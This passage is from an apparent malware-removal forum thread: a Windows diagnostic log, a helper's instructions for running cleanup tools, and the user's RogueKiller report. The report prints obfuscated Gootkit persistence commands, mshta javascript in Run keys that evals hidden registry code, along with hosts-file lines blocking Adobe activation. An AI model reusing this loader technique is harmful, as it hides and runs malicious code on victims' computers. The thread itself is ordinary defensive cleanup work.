FirewallRules: [{E30013BD-1B2B-48F5-B820-DE04743C1E86}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
FirewallRules: [{2BB702D9-1245-4D26-A315-C754AF0F36B1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
FirewallRules: [{AF43E85E-200E-4B18-BB3D-680FB887081A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
FirewallRules: [{8381001C-A553-4363-98A4-718210190CDD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
FirewallRules: [{516A7A49-3AF8-490F-B604-589A22869AB5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Kane & Lynch 2 - Dog Days\kl2.exe
FirewallRules: [{3F12F5A9-0F34-4E36-B08D-68533D6000DF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Kane & Lynch 2 - Dog Days\kl2.exe
FirewallRules: [{293A8051-D248-446F-8B45-B04BA33F08B5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Lichdom Battlemage\Bin64\LichdomBattlemage.exe
FirewallRules: [{5D9F9629-996C-45DC-A119-A7680588D836}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Lichdom Battlemage\Bin64\LichdomBattlemage.exe
FirewallRules: [{D233B9DC-2FED-47A8-89C7-8166F79FE114}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Kane and Lynch Dead Men\Launcher.exe
FirewallRules: [{1B134A9C-E90D-47B5-885E-BEE19CED109A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Kane and Lynch Dead Men\Launcher.exe
FirewallRules: [{342D35FB-2CF5-48E4-85B7-BC255FD04D07}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{E1C9D1D2-411F-4E33-A7E7-2B29144D30E3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Robocraft\Robocraft.exe
FirewallRules: [{109C0651-232C-427A-BEE8-D5D22BD0A806}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Talisman\Talisman.exe
FirewallRules: [{A528B2BA-6900-4B58-B058-325878AE468D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Talisman\Talisman.exe
FirewallRules: [TCP Query User{90F7D485-0B7E-4B18-B0BD-1E13CA929588}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{1A0688EC-AAB1-4265-9DF6-73FB31C8ECDF}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{B2B43722-80FF-4936-9179-7E576D4D2036}] => (Allow) C:\Program Files (x86)\Electronic Arts\BioWare\Star Wars - The Old Republic\launcher.exe
FirewallRules: [{FCFD4C0B-433F-449F-99F7-22396AFA55FE}] => (Allow) C:\Program Files (x86)\Electronic Arts\BioWare\Star Wars - The Old Republic\launcher.exe
FirewallRules: [{758D6ECC-50E0-40A1-9178-7E42690DB85D}] => (Allow) C:\Program Files (x86)\Electronic Arts\BioWare\Star Wars - The Old Republic\launcher.exe
FirewallRules: [{A32C98ED-D8A9-4CDD-B86E-7676A1AEA8A8}] => (Allow) C:\Program Files (x86)\Electronic Arts\BioWare\Star Wars - The Old Republic\launcher.exe
FirewallRules: [{05E6FAB2-889E-49E6-88CE-25B90AD5275F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Destination Sol\sol.exe
FirewallRules: [{35220FB5-CD8A-4469-9E7B-7698192958A8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Destination Sol\sol.exe
FirewallRules: [{A91F176C-0F9A-4C79-BB49-8D43AE068F2A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Ironcast\Ironcast.exe
FirewallRules: [{17ADA21D-F3EC-4E64-81DD-D88E855D9065}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Ironcast\Ironcast.exe
FirewallRules: [{9DC4E7A7-2E88-4984-9EA3-805225EE1221}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Hawken\Binaries\Win32\HawkenGame-Win32-Shipping.exe
FirewallRules: [{14103122-47E3-4A61-BC0C-C783A190622A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Hawken\Binaries\Win32\HawkenGame-Win32-Shipping.exe
FirewallRules: [{3BAE6CB5-AC4A-447A-9100-467546753895}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Star Wars Battlefront II\GameData\BattlefrontII.exe
FirewallRules: [{CE874F42-950F-4C79-9598-917708FB5DF7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Star Wars Battlefront II\GameData\BattlefrontII.exe
FirewallRules: [{C1B0E76E-6FD8-4C4C-9991-6117EF192FCE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Divinity Dragon Commander\Shipping\DCApp.exe
FirewallRules: [{0B2AE3C8-2523-4489-914B-5F36FF4B17EC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Divinity Dragon Commander\Shipping\DCApp.exe
FirewallRules: [{FCA14CA4-248F-4C2B-90E7-57BC6183D803}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{CA09A3E8-E4EB-417F-A47A-BDC135BE88D9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{B7283AA8-E16F-4752-BC2C-4EFBD46C75C9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{0BE4EBF8-35F0-4C06-A2AF-3EC21AB4F6F9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{DB4B9AA0-1C4D-4FC3-BC10-DACCEDE6B96C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{F3395DBC-BD03-49DE-B2CC-995C33F84037}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{75148857-2A34-4C2D-9CD2-0F6B311B8C74}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeCam.exe
FirewallRules: [{7C80CB49-E742-4D5C-ADA2-2677DA1CE34D}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeCam.exe
FirewallRules: [{E765CAFD-E5BD-4E88-B97E-4E61235A840F}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe
FirewallRules: [{F14E07C3-1423-400E-855E-21924951DB73}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeEnC2.exe
FirewallRules: [{B4D1C03C-F8E9-495E-804E-4D7E8B593CC3}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe
FirewallRules: [{6C1911BF-02A3-4789-AB50-F73B8B8B46C3}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe
FirewallRules: [{D9D2F76D-9E2D-420E-8C42-9FDE9382F4A8}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe
FirewallRules: [{70192E1A-96E9-4E3C-ADB4-25494F8E9965}] => (Allow) C:\Program Files (x86)\Microsoft LifeCam\LifeTray.exe
FirewallRules: [{3DD77A32-815F-4BFE-86DB-B334966DDA22}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SunlessSea\Sunless Sea.exe
FirewallRules: [{56C3E723-B91E-4AFB-A3AC-37953ACB51B7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\SunlessSea\Sunless Sea.exe
FirewallRules: [{43BDE3C4-C9B9-4F5B-9B4B-C5D5B7F56F40}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\tbs\win32\The Banner Saga.exe
FirewallRules: [{C0D8E1E6-C395-4C5A-8993-A3C7A06CEF84}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\tbs\win32\The Banner Saga.exe
FirewallRules: [{13A3A2A2-C9AE-45A1-BE97-0C6DAE5161B3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Space\spacegame\Binaries\Win64\spacegame-Win64-Shipping.exe
FirewallRules: [{F105DFC3-1729-4798-A93B-E92C25A26775}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Space\spacegame\Binaries\Win64\spacegame-Win64-Shipping.exe
FirewallRules: [{2698729F-53E7-4946-B714-F1FAEA487B10}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{C22FB332-DD74-44A6-8C71-25F6093C7326}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{90236868-15AA-453F-ACFC-C501FD2DED1C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{D4472DF7-FD3B-4DD8-95EF-1BC69D55CC2F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{18F6D936-C0C4-42CB-9F54-B2BDB2EFBFAC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============

Name: csfd_1_10_0_17
Description: csfd_1_10_0_17
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: csfd_1_10_0_17
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

Application errors:
==================
Error: (07/17/2015 04:40:56 PM) (Source: AVLogEvent) (EventID: 5005) (User: NT AUTHORITY)
Description: Content is missing.
Error Code:a7f42014

Error: (07/17/2015 02:04:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: AUDIODG.EXE, version: 6.1.7601.18741, time stamp: 0x54d036f1
Faulting module name: VIASysFx.dll, version: 1.0.0.0, time stamp: 0x4f3def2b
Exception code: 0xc0000005
Fault offset: 0x000000000006104e
Faulting process id: 0x1874
Faulting application start time: 0xAUDIODG.EXE0
Faulting application path: AUDIODG.EXE1
Faulting module path: AUDIODG.EXE2
Report Id: AUDIODG.EXE3

Error: (07/16/2015 07:40:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ismagent.exe, version: 1.8.0.34787, time stamp: 0x4ecfc3d4
Faulting module name: MSVCR90.dll, version: 9.0.30729.6161, time stamp: 0x4dace5b9
Exception code: 0x80000003
Fault offset: 0x00073469
Faulting process id: 0x9d4
Faulting application start time: 0xismagent.exe0
Faulting application path: ismagent.exe1
Faulting module path: ismagent.exe2
Report Id: ismagent.exe3

Error: (07/15/2015 10:20:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: AUDIODG.EXE, version: 6.1.7601.18741, time stamp: 0x54d036f1
Faulting module name: VIASysFx.dll, version: 1.0.0.0, time stamp: 0x4f3def2b
Exception code: 0xc0000005
Fault offset: 0x000000000006104e
Faulting process id: 0x490
Faulting application start time: 0xAUDIODG.EXE0
Faulting application path: AUDIODG.EXE1
Faulting module path: AUDIODG.EXE2
Report Id: AUDIODG.EXE3

Error: (07/15/2015 07:39:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ismagent.exe, version: 1.8.0.34787, time stamp: 0x4ecfc3d4
Faulting module name: MSVCR90.dll, version: 9.0.30729.6161, time stamp: 0x4dace5b9
Exception code: 0x80000003
Fault offset: 0x00073469
Faulting process id: 0xd24
Faulting application start time: 0xismagent.exe0
Faulting application path: ismagent.exe1
Faulting module path: ismagent.exe2
Report Id: ismagent.exe3

Error: (07/14/2015 05:04:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.17840 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2fd0

Start Time: 01d0beaac4032b7a

Termination Time: 60

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

Error: (07/13/2015 02:31:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.17840 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 6bcc

Start Time: 01d0bdcc3e7a520a

Termination Time: 170

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

Error: (07/12/2015 03:54:46 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.17840 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 6e4c

Start Time: 01d0bcaa3a304928

Termination Time: 92

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

Error: (07/09/2015 06:16:25 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.17840 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 6694

Start Time: 01d0ba6277bda203

Termination Time: 27

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

Error: (07/08/2015 04:57:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.17840 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 5c5c

Start Time: 01d0b9f24cdd7ab5

Termination Time: 110

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:


System errors:
=============
Error: (07/17/2015 05:28:49 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {209500FC-6B45-4693-8871-6296C4843751}

Error: (07/17/2015 05:25:18 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
csfd_1_10_0_17

Error: (07/17/2015 05:23:13 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Hi-Rez Studios Authenticate and Update Service service to connect.

Error: (07/17/2015 05:23:06 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

Error: (07/17/2015 05:15:09 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (07/17/2015 05:04:32 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.

Error: (07/17/2015 05:04:23 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {1F87137D-0E7C-44D5-8C73-4EFFB68962F2}

Error: (07/17/2015 04:44:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Intuit Update Service v4 service failed to start due to the following error:
%%1053

Error: (07/17/2015 04:44:37 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Intuit Update Service v4 service to connect.

Error: (07/17/2015 04:44:07 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Intuit Update Service service failed to start due to the following error:
%%1053


Microsoft Office:
=========================
Error: (07/17/2015 04:40:56 PM) (Source: AVLogEvent) (EventID: 5005) (User: NT AUTHORITY)
Description: a7f42014

Error: (07/17/2015 02:04:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: AUDIODG.EXE6.1.7601.1874154d036f1VIASysFx.dll1.0.0.04f3def2bc0000005000000000006104e187401d0c057c34b4d80C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\VIASysFx.dll8821c864-2ce0-11e5-8a78-e0b9a5fb19ef

Error: (07/16/2015 07:40:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: ismagent.exe1.8.0.347874ecfc3d4MSVCR90.dll9.0.30729.61614dace5b980000003000734699d401d0c047da01eabfC:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\ismagent.exeC:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCR90.dll66be859d-2c46-11e5-904e-e0b9a5fb19ef

Error: (07/15/2015 10:20:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: AUDIODG.EXE6.1.7601.1874154d036f1VIASysFx.dll1.0.0.04f3def2bc0000005000000000006104e49001d0bf64e7dfc425C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\VIASysFx.dll748aaad3-2b93-11e5-a1c9-e0b9a5fb19ef

Error: (07/15/2015 07:39:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: ismagent.exe1.8.0.347874ecfc3d4MSVCR90.dll9.0.30729.61614dace5b98000000300073469d2401d0bf65194b75f6C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\ismagent.exeC:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCR90.dll06062020-2b7d-11e5-a1c9-e0b9a5fb19ef

Error: (07/14/2015 05:04:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: IEXPLORE.EXE11.0.9600.178402fd001d0beaac4032b7a60C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Error: (07/13/2015 02:31:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: IEXPLORE.EXE11.0.9600.178406bcc01d0bdcc3e7a520a170C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Error: (07/12/2015 03:54:46 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: IEXPLORE.EXE11.0.9600.178406e4c01d0bcaa3a30492892C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Error: (07/09/2015 06:16:25 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: IEXPLORE.EXE11.0.9600.17840669401d0ba6277bda20327C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Error: (07/08/2015 04:57:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: IEXPLORE.EXE11.0.9600.178405c5c01d0b9f24cdd7ab5110C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentage of memory in use: 42%
Total physical RAM: 8151.92 MB
Available physical RAM: 4693.5 MB
Total Virtual: 16302.04 MB
Available Virtual: 12347.46 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:906.19 GB) (Free:413.99 GB) NTFS ==>[system with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 527CD163)

Partition: GPT Partition Type.

==================== End of log ============================

 

[Broni]

Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2

• Close all the running programs
• Windows Vista/7/8 users: right click on RogueKiller.exe, click Run as Administrator
• Otherwise just double-click on RogueKiller.exe
• Pre-scan will start. Let it finish.
• Click on SCAN button.
• Wait until the Status box shows Scan Finished
• Click on Delete.
• Wait until the Status box shows Deleting Finished.
• Click on Report and copy/paste the content of the Notepad into your next reply.
• RKreport.txt could also be found on your desktop.
• If more than one log is produced post all logs.
• If RogueKiller has been blocked, do not hesitate to try a few times more. If really won't run, rename it to winlogon.exe (or winlogon.com) and try again

Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
NOTE. If you already have MBAM 2.0 installed scroll down.

• Double-click mbam-setup-2.0.0.1000.exe and follow the prompts to install the program.
  
• At the end, be sure a checkmark is placed next to the following:
  
• Launch Malwarebytes Anti-Malware
• A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  
• Click Finish.
• On the Dashboard, click the 'Update Now >>' link
• After the update completes, click the 'Scan Now >>' button.
  
• Or, on the Dashboard, click the Scan Now >> button.
• If an update is available, click the Update Now button.
  
• A Threat Scan will begin.
• When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
• In most cases, a restart will be required.
• Wait for the prompt to restart the computer to appear, then click on Yes.

If you already have MBAM 2.0 installed:

• On the Dashboard, click the 'Update Now >>' link
• After the update completes, click the 'Scan Now >>' button.
  
• Or, on the Dashboard, click the Scan Now >> button.
• If an update is available, click the Update Now button.
  
• A Threat Scan will begin.
• When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
• In most cases, a restart will be required.
• Wait for the prompt to restart the computer to appear, then click on Yes.

How to get logs:
(Export log to save as txt)

• After the restart once you are back at your desktop, open MBAM once more.
• Click on the History tab > Application Logs.
• Double click on the Scan Log which shows the Date and time of the scan just performed.
• Click 'Export'.
• Click 'Text file (*.txt)'
• In the Save File dialog box which appears, click on Desktop.
• In the File name: box type a name for your scan log.
• A message box named 'File Saved' should appear stating "Your file has been successfully exported".
• Click Ok
• Attach that saved log to your next reply.

(Copy to clipboard for pasting into forum replies or tickets)

• After the restart once you are back at your desktop, open MBAM once more.
• Click on the History tab > Application Logs.
• Double click on the Scan Log which shows the Date and time of the scan just performed.
• Click 'Copy to Clipboard'
• Paste the contents of the clipboard into your reply.

Please download AdwCleaner by Xplode onto your desktop.

• Close all open programs and internet browsers.
• Double click on adwcleaner.exe to run the tool.
• Click on Scan button.
• When the scan has finished click on Clean button.
• Your computer will be rebooted automatically. A text file will open after the restart.
• Please post the contents of that logfile with your next reply.
• You can find the logfile at C:\AdwCleaner[S1].txt as well.

Please download Junkware Removal Tool to your desktop.

• Shut down your protection software now to avoid potential conflicts.
• Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
• The tool will open and start scanning your system.
• Please be patient as this can take a while to complete depending on your system's specifications.
• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
• Post the contents of JRT.txt into your next message.

 

[Domo124]

Here is the first report, working on the next:

RogueKiller V10.9.1.0 (x64) [Jul 9 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : J. Powers [Administrator]
Started from : C:\Users\J. Powers\Downloads\RogueKillerX64.exe
Mode : Delete -- Date : 07/18/2015 10:50:38

¤¤¤ Processes : 6 ¤¤¤
[Proc.Injected] svchost.exe(3228) -- C:\Windows\SysWOW64\svchost.exe[x] -> [NoKill]
[Proc.Svchost] svchost.exe(3228) -- C:\Windows\SysWOW64\svchost.exe[7] -> Killed [TermProc]
[Proc.Injected] svchost.exe(6148) -- C:\Windows\SysWOW64\svchost.exe[x] -> [NoKill]
[Proc.Svchost] svchost.exe(6148) -- C:\Windows\SysWOW64\svchost.exe[7] -> Killed [TermProc]
[Proc.Injected] firefox.exe(7728) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe[7] -> Killed [TermProc]
[Proc.Svchost] svchost.exe(1788) -- C:\Windows\SysWOW64\svchost.exe[7] -> Killed [TermThr]

¤¤¤ Registry : 9 ¤¤¤
[Tr.Gootkit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 94ee119e : mshta javascript:ScucY2w="i8IlP6g";T9L5=new%20ActiveXObject("WScript.Shell");ijGN50iRR="plWHz";QiH5H=T9L5.RegRead("HKLM\\software\\Wow6432Node\\e6a2881f\\84f4448c");naAD65DL="Vq";eval(QiH5H);yDe5xQKsv="pkQCAhl"; [x][x] -> ERROR [c0000034]
[Tr.Gootkit] (X64) HKEY_USERS\S-1-5-21-3654736093-338424075-1572945638-1002\Software\Microsoft\Windows\CurrentVersion\Run | 94ee119e : mshta javascript:d9ZJuvP3dy="iQk";cu56=new%20ActiveXObject("WScript.Shell");LFWDTEi1="Fu";FLm1w=cu56.RegRead("HKCU\\software\\e6a2881f\\84f4448c");WG5yxTq="zGvYJl4";eval(FLm1w);Xly5cs5e="gLH"; [x][x] -> ERROR [c0000034]
[Tr.Gootkit] (X86) HKEY_USERS\S-1-5-21-3654736093-338424075-1572945638-1002\Software\Microsoft\Windows\CurrentVersion\Run | 94ee119e : mshta javascript:d9ZJuvP3dy="iQk";cu56=new%20ActiveXObject("WScript.Shell");LFWDTEi1="Fu";FLm1w=cu56.RegRead("HKCU\\software\\e6a2881f\\84f4448c");WG5yxTq="zGvYJl4";eval(FLm1w);Xly5cs5e="gLH"; [x][x] -> ERROR [c0000034]
[Tr.Gootkit] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | dd7d1640 : mshta javascript:SgUTke5N="d";PU62=new%20ActiveXObject("WScript.Shell");FD7kn6Yy="WJpxC2YlX";YyT5Z2=PU62.RegRead("HKLM\\software\\Wow6432Node\\e6a2881f\\84f4448c");tzTVwZ8="m";eval(YyT5Z2);sWHlB1k="RJ6Cbv"; [x][x] -> ERROR [c0000034]
[Tr.Gootkit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | dd7d1640 : mshta javascript:SgUTke5N="d";PU62=new%20ActiveXObject("WScript.Shell");FD7kn6Yy="WJpxC2YlX";YyT5Z2=PU62.RegRead("HKLM\\software\\Wow6432Node\\e6a2881f\\84f4448c");tzTVwZ8="m";eval(YyT5Z2);sWHlB1k="RJ6Cbv"; [x][x] -> ERROR [c0000034]
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3654736093-338424075-1572945638-1002\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com -> Not selected
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3654736093-338424075-1572945638-1002\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://asus.msn.com -> Not selected
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Not selected
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Not selected

¤¤¤ Tasks : 2 ¤¤¤
[Suspicious.Path|VT.Trojan.GenericKD.2499184] %WINDIR%\Tasks\Run_dregol.job -- C:\Users\J5DFD~1.POW\AppData\Roaming\RUN_DR~1\UPDATE~1\UPDATE~1.EXE (/Check) -> ERROR [0]
[Suspicious.Path|VT.Trojan.GenericKD.2499184] \Run_dregol -- C:\Users\J5DFD~1.POW\AppData\Roaming\RUN_DR~1\UPDATE~1\UPDATE~1.EXE (/Check) -> ERROR [0]

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 15 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 activate.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 practivate.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 ereg.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 activate.wip3.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 wip3.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 3dns-3.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 3dns-2.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 adobe-dns.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 adobe-dns-2.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 adobe-dns-3.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 ereg.wip3.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 activate-sea.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 wwis-dubc1-vip60.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 activate-sjc0.adobe.com
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 adobeereg.com

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] ad713a678123121a6c749d3ccf01951a
[BSP] 9232ae22d11388c45bfb33240f8535b1 : Empty MBR Code
Partition table:
0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 200 MB
1 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 411648 | Size: 128 MB
2 - Basic data partition | Offset (sectors): 673792 | Size: 927940 MB
3 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1901094912 | Size: 25600 MB
User = LL1 ... OK
User = LL2 ... OK

 

[Domo124]

Here is the MalwareBytes file:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 7/18/2015
Scan Time: 10:57 AM
Logfile: MalHist.txt
